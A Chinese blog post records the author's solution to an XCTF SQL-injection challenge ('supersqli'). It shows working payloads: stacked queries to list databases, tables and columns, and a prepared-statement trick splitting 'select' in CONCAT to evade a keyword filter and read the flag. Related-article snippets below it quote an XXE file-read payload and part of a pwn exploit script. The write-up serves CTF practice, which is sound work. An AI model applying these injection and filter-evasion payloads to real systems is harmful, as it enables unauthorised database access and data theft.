2020-12-20 xctf刷题记录

最新推荐文章于 2022-01-07 22:13:18 发布
最新推荐文章于 2022-01-07 22:13:18 发布
阅读量215 收藏
点赞数
分类专栏: ctf刷题记录
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_49503725/article/details/111455313
版权
sqli1 and 1=11 and 1=2正常且有回显 说明存在注入1’ 报错 说明为字符型注入1’# 正常且有回显 说明为单引号闭合1’ order by 1# 正常且有回显1’ order by 2# 正常且有回显1’ order by 3# 报错说明注入点在2,有两列于是union查询’ and 1=2 union select 1,2,database()#触发了过滤原则 select被ban掉了思路受阻参考wp发现这个题考查了堆叠注入于是查看所有的表名1
摘要由CSDN通过智能技术生成

sqli

1 and 1=1
1 and 1=2
正常且有回显 说明存在注入
1’ 报错 说明为字符型注入
1’# 正常且有回显 说明为单引号闭合
1’ order by 1# 正常且有回显
1’ order by 2# 正常且有回显
1’ order by 3# 报错
说明注入点在2,有两列

于是union查询
’ and 1=2 union select 1,2,database()#
触发了过滤原则 select被ban掉了
思路受阻
参考wp发现这个题考查了堆叠注入

于是查看所有的表名
1’;show databases;
得到六个库名
“ctftraining”
“information_schema”
“mysql”
“performance_schema”
“supersqli”
“test”

查看所有的表名
1’;show tables;
得到两个表名
“1919810931114514”
“words”

查看每张表里面所有的列名
1’;show columns from words;
正常且有回显,得到列名"id" “int(10)” “NO"没有想要的
1’;show columns from ‘1919810931114514’;
1’;show columns from 1919810931114514;
(注意这里的表名应该加上反引号"`",不然会没有回显)
正常且有回显,得到列名"flag”“NO”“varchar(100)”

关于反引号
1、mysql语句中 反引号 作用: 避免表名、字段名与mysql已存在的【保留字】冲突,引起不知名错误。
2、所以我们建表和字段时候,特别需要注意,尽量使用全拼/下划线 来设置字段和表名
3、连接不同数据库查询,一定不要加反引号,否则会被解析成 单个表
4、为了区分MYSQL的保留字与普通字符而引入的符号。
举个例子:SELECT select FROM test WHERE select=‘字段值’
在test表中,有个select字段,如果不用反引号,MYSQL将把select视为保留字而导致出错,所以,有MYSQL保留字作为字段的,必须加上反引号来区分。
引号一般用在字段的值,如果字段值是字符或字符串,则要加引号,如:select=‘字段值’
不加反引号建的表不能包含MYSQL保留字,否则出错
参考链接
mysql寒假要好好看看

除此之外,这道题还考查了select被ban掉之后的处理办法
预编译语句

预编译语句的流程
SET;									# 用于设置变量名和值
PREPARE stmt_name FROM preparable_stmt;	# 用于预备一个语句,并赋予名称,以后可以引用该语句
EXECUTE stmt_name;			 			# 执行语句
{
   DEALLOCATE | DROP} PREPARE stmt_name;	# 用来释放掉预处理的语句

于是我们构造

-1'; #前面的语句不执行
set @sql=CONCAT('se','lect * from `1919810931114514`;'); #连接这两个字符串变量
prepare stmt from @sql; 
execute stmt;
最低0.47元/天 解锁文章
G0t1t
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
XCTF OpenCTF 2017 部分WP(8道)
qq_42192672的博客
10-10 1683
最近想去看看XCTF实训平台,算是给自己的一个督促吧,选的第一个目标是OpenCTF 2017 1. OpenReverse 拖进IDA分析main函数,截图如下 其实就是比较v30与v4地址处的字符串是否相等,v30是我们的输入,那么关键就是看v4了 v4的初始值我们都知道,接下来观察函数40100对v4有什么改变 发现有对v4开始的26个字符全部进行了一个异或操作 当然拉我们动...
2020XCTF华为云专场pwnWP
Sakura给爷pwn全场
12-23 467
Pwn CPP 解思路 ⽬存在uaf,结合堆⻛⽔getshell #!/usr/bin/python #coding:utf-8 from pwn import * context.log_level='debug' #io=process("./chall",env={"LD_PRELOAD":"./libc-2.31.so"}) io=remote('124.70.12.210', 10002) libc=ELF("./libc-2.31.so") sla=lambda a : io.sendlin
2020 华为xctf第二场
Firebasky的博客
12-24 650
第二次就做了一个web,web3是看三之师傅的wp复现的。 如果wp有错误希望师傅们指出 链接:https://pan.baidu.com/s/16BhdYDuD7yR-eBH-zgbsow 提取码:t2rl 复制这段内容后打开百度网盘手机App,操作更方便哦
XCTF_WP_新手向
Lee_7Z的博客
12-01 316
XCTF_WP_新手向 文章目录XCTF_WP_新手向REVERSE一、新手区二、进阶区——————————————————————MISC一、新手区二、进阶区总结 提示:以下是本篇文章正文内容,下面WP可供参考 REVERSE 一、新手区 insanity 拖进IDA,发现main函数没啥用,shift+F12看到 猜测9447{This is a flag}为flag,提交通过 二、进阶区 —————————————————————— MISC 一、新手区 this_is_flag
xctfwp
zyh18851473527的博客
09-23 1158
首先将其拖进IDA64中查看一下 根据代码可以得知猜对50次的数字后就可以get flag了 但是实际上只给buf分配了0x30的空间 buf 长度最长为 0x50 但是当输入大于 49 的时候不会被截断,所以我们只要覆盖到之前的 seed 就可以为所欲为了。 同时注意到 seed 跟 buf 相差的偏移是 0x40,所以只要 68 个字符就可以溢出覆盖 seed 了。我们写入0x40的数据就可以...
2020-12-18 xctf记录
G0t1t的博客
12-20 200
NewsCenter sqlmap工具使用教程 手工注入详细教程(挺透彻的很喜欢 and 1=1 and 1=2 正常且无回显 说明存在注入 ' 报错 说明为字符型注入 '# 正常且有回显 说明为单引号闭合 ' order by 1# 正常且有回显 ' order by 2# 正常且有回显 ' order by 3# 正常且有回显 ' order by 4# 报错 注入点在3,有3列 查库名 ' and 1=2 union select 1,2,database()# 库名为news 查表名 ' a
XMan-MISC-诸葛建伟XCTF-public.pdf
12-04
MISC,中文即杂项,包括隐写,数据还原,脑洞、社会工程、与信息安全相关的大数据等。 竞赛过程中解MISC时会涉及到各种脑洞,各种花式技巧,主要考察选手的快速理解、学习能力以及日常知识积累的广度、深度。...
xctf_huaweicloud-qualifier-2020
05-31
xctf_huaweicloud-qualifier-2020写上去译文原始码类别名称网址分数解决了PWN cp 游戏 快速执行 Fastga mysqli 迷你人 nday_container_escape qemu-zzz 网络隐藏云我的1 我的2 派尔 网壳 :cross_mark: 杂项以太网 谁...
XCTF-2019-tfboys:XCTF 2019最终网络任务“ tfboys”的源代码
05-18
XCTF-2019-tfboys tfboys又名TensorFlow Boys 部署(Python3) pip install -r requirements.txt cd web3 python run.py 迪尔斯 web3/model/default/ : pre-trained LSTM model. exploit/exploit.ipynb : codes...
XCTF mfc逆向-200
12-22
查壳 vmp。。。 看了大佬博客后得知解法 这是一个MFC程序,但我不会。。。...但是我知道mfc的程序应该都是一个个控件组成 ...发现这两个东西,第一个是窗口类名,第二个我也不晓得是啥,但是它比前面和后面的少了一个消息...
SQLi-LABS(1~10关详解)
CTF小白的博客
09-22 6453
目录SQLi-LABS Less-1查看目环境测试注入点SQL注入查找列数查询数据库查询数据库中的表查表中的字段查数据SQLi-LABS Less-2查看目环境测试注入点SQL注入查找列数查询数据库查询数据库中的表查表中的字段查数据SQLi-LABS Less-3查看目环境测试注入点SQL注入查找列数查询数据库查询数据库中的表查表中的字段查数据SQLi-LABS Less-4查看目环境测试...
XCTF easychallenge WP
weixin_46227016的博客
12-13 193
easychallenge 下载附件得到是一个pyc文件,对pyc代码反编译,可以得到其python代码 # !/usr/bin/env python # visit http://tool.lu/pyc/ for more information import base64 def encode1(ans): s = '' for i in ans: x = ord(i) ^ 36 x = x + 25 s += chr(x)
php if none match,从一道CTF的非预期解看PHP反斜杠匹配问
weixin_27697385的博客
03-11 476
前言buuoj的时候遇到这样一个,做一半看到他这个正则写的有点问,就去翻wp。image找到了官方的wp发现果然是个非预期。image但是官方wp中并没有深入说明。后来看到评论去翻出人的博客也没找到相关的信息,加上看到了其他wp中一些不准确的说法,所以今天就有了这篇文章来讲一讲自己的看法。正文目源码error_reporting(E_ALL || ~ E_NOTICE);header('...
XctfWP
qq_63267612的博客
01-07 2704
文章目录base64CaesarMorse幂数加密easy_RSARobotsBackup base64 直接网站解密http://www.hiencode.com/base64.html Caesar 观察像是凯撒密码尝试解密,偏移位数慢慢尝试发现是12得到flag https://www.qqxiuzi.cn/bianma/kaisamima.php Morse 目名称是morse所以是摩斯密码,然后在记事本中把1换成-把0换成.然后去网站解密得到flag http://json365.com/m
CTFShow XXE
paidx0
08-26 1806
前言 XXE 的漏洞在我的上一篇文章有讲过,这里就不多说,直接看 XXE外部实体注入 web373 有回显的文件读取 <?xml version="1.0"?> <!DOCTYPE xml [ <!ENTITY xxe SYSTEM "file:///flag"> ]> <paidx0> <ctfshow>&xxe;</ctfshow> </paidx0> web374~376 无回显的文件读取,禁用了版本
XCTF-Web-高手区-supersqli
1stPeak's Blog
06-21 720
目 解 1、使用常规的SQL注入操作进行注入,我们测试一下单引号 根据返回显示,我们可以判断目标源码中的SQL语句是字符型的,使用单引号闭合 我们本地使用mysql测试如下 2、使用#、--进行测试 发现报错,直接试试编码,将#或--替换为%23或--+ 3、接下来使用order by判断字段数 可以发现,存在两个字段数 4、使用union select判断哪个位置的字段可以进行注入 发现存在过滤,将我的语句过滤了 5、使用堆叠注入 (1)查看所有数据库名 (2)查看所有表名 (3
2016xctf一道ctf
热门推荐
一个码农的笔记
09-22 3万+
首先是index.php: <?php $user = $_GET["user"]; $file = $_GET["file"]; $pass = $_GET["pass"]; if(isset($user)&&(file_get_contents($user,'r')==="the user is admin")){ echo "hello admin!"; if(preg_
XCTF mobile新手区解记录(WP)以及一些总结和思考
windy_ll的博客
03-28 1032
前言     疫情当下,都已经耍了好几个月了,都不知道干啥了,好不容易等到我四川宣布开学时间了,结果四川高校一点动静都没有,无聊中,那就写一下解记录吧,有些先前已经在我个人博客上发过了,就不再重复写了,贴个链接就行了!!! 目:app3     此wp已经在个人博客写过,不在详细说明,详情请看链接:https://www.52pojie.cn/thread-1082706-1-1.htm...
XCTF_asong_WP
qq_43445167的博客
03-07 444
确实恶心。 本的整体逻辑是通过输入的字符串变换that_girl文件,再把变换的数据写入out文件。属于已知密文求明文。 整体逻辑是通过对that_girl文本文件进行词频分析。 将输入的字符串转换为对应词频数组v1。 对v1进行类似与a=b,b=c,c=a 的元素顺序交换,记为v2。 将整个v2视为一整个二进制流循环左移3位,记为v3。 将v3写入out文件 解密脚本如下: #includ...
实战环境下的网络空间安全教育:GMIC-XCTF京津冀邀请赛与人才培养
"GMIC-XCTF京津冀邀请赛是一场聚焦网络空间安全的竞赛,旨在通过实战环境锤炼网络空间安全人才,推动该领域的人才培养。比赛中,北京航空航天大学的Lancet战队脱颖而出,获得了冠军。本次赛事体现了网络安全教育的新...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值